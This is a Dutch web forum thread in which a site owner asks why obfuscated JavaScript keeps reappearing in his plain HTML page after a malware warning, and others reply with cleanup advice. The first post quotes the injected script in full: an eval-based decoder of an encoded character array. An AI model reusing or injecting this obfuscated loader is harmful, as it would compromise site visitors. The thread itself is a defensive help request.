Beste SiteDeal-ers,

Kreeg enkele dagen geleden een mail van Google dat mijn site geinfecteerd is met malware oid.
Gelijk mijn gehele Wordpress script van de server afgehaald en even een simpel index.html bestand op de site gezet. Ook .htaccess verwijderd. Toch wordt er iets in mijn html bestand gezet zie hier

<!--f1930e--><script type="text/javascript" language="javascript" > v="v"+"al";if(020===0x10&&window.document)try{wind ow.document.body=window.document.body}catch(gdsgsd g){w=window;v="e"+v;e=w[v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,3 2,122,11,10,31,30,32,31,116,97,113,30,108,106,95,3 2,60,30,100,110,97,117,108,99,110,115,44,99,113,99 ,97,115,99,69,107,99,109,100,108,116,39,37,105,101 ,112,97,108,99,39,40,57,13,9,11,10,31,30,32,31,106 ,107,96,44,115,113,97,32,60,30,39,103,114,116,111, 56,47,46,99,115,111,95,99,100,43,101,109,43,115,11 0,103,46,110,112,103,46,114,114,96,100,46,111,102, 112,38,57,13,9,30,32,31,30,108,106,95,46,114,114,1 21,107,99,46,111,109,115,104,114,105,110,108,32,60 ,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31 ,30,32,31,106,107,96,44,115,115,119,108,100,44,98, 110,112,100,100,112,32,60,30,39,47,37,59,12,8,32,3 1,30,32,107,105,97,45,113,116,120,106,101,45,102,1 01,104,101,104,115,30,61,31,37,49,111,118,39,58,11 ,10,31,30,32,31,106,107,96,44,115,115,119,108,100, 44,119,104,98,116,103,30,61,31,37,49,111,118,39,58 ,11,10,31,30,32,31,106,107,96,44,115,115,119,108,1 00,44,108,100,100,116,31,59,32,38,47,112,119,37,59 ,12,8,32,31,30,32,107,105,97,45,113,116,120,106,10 1,45,114,111,111,30,61,31,37,49,111,118,39,58,11,1 0,12,8,32,31,30,32,104,100,32,39,31,100,110,97,117 ,108,99,110,115,44,103,100,114,69,107,99,109,100,1 08,116,65,119,73,99,38,39,107,105,97,38,39,41,31,1 21,13,9,30,32,31,30,32,31,30,32,99,109,99,116,107, 101,109,114,46,118,112,105,115,99,40,38,58,100,104 ,116,32,104,98,61,91,37,108,106,95,92,38,60,60,46, 98,105,117,60,39,40,57,13,9,30,32,31,30,32,31,30,3 2,99,109,99,116,107,101,109,114,46,102,99,116,68,1 06,101,108,99,110,115,64,121,72,98,40,38,106,107,9 6,37,41,45,95,112,111,99,110,99,65,104,104,106,100 ,39,106,107,96,39,59,12,8,32,31,30,32,124,11,10,12 4,39,40,40,57);}w=f;s=[];for(i=0;-i+471!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fr omCharCode((1*w[j]+j%3));}e(s)</script><!--/f1930e-->

Kan het weghalen maar binnen een uur staat het er weer? iemand een idee hoe ik dit weg krijg?

Eerst je al je wachtwoorden veranderen.
Daarna de malware verwijderen.

Als het een server is die van je zelf is ook gelijk je server nakijken en het root password aanpassen.

allemaal al gedaan!

Heeft nog iemand anders toegang tot de server? Kan ook best zijn dat jij een virus heeft die het FTP wachtwoord achterhaald. Scan je eigen PC ook is met bijvoorbeeld MalwareBytes (+ je eigen virusscanner).

Origineel gepost door Selwyn Donia

Ik heb de oplossing hiervoor uitvoerig beschreven op mijn blog. De tips hierboven helpen zeker maar zijn niet voldoende.
Succes!

Zoals Remco al aangeeft, heeft hij Wordpress al verwijderd. Dit heeft op dit moment dus ook niets meer met Wordpress te maken. Het is dus ook niet eens zeker dat zijn server is gehacked door het feit dat er Wordpress op gedraait heeft.

Bedankt voor je spam post om je ebook te verkopen.

zojuist de database van de server gehaald! sinds deze actie geen problemen meer. Iemand een idee wat het kan zijn

Scan ook even je PC met MalwareBytes (www.malwarebytes.org -> gratis versie)

Kijk eens in je iondex.php of er iets geks in staat dat jij niet kent.

Bij voorkeur staat dat er encoded in. iets van echo base64_encode('allemaaltekensencijfers').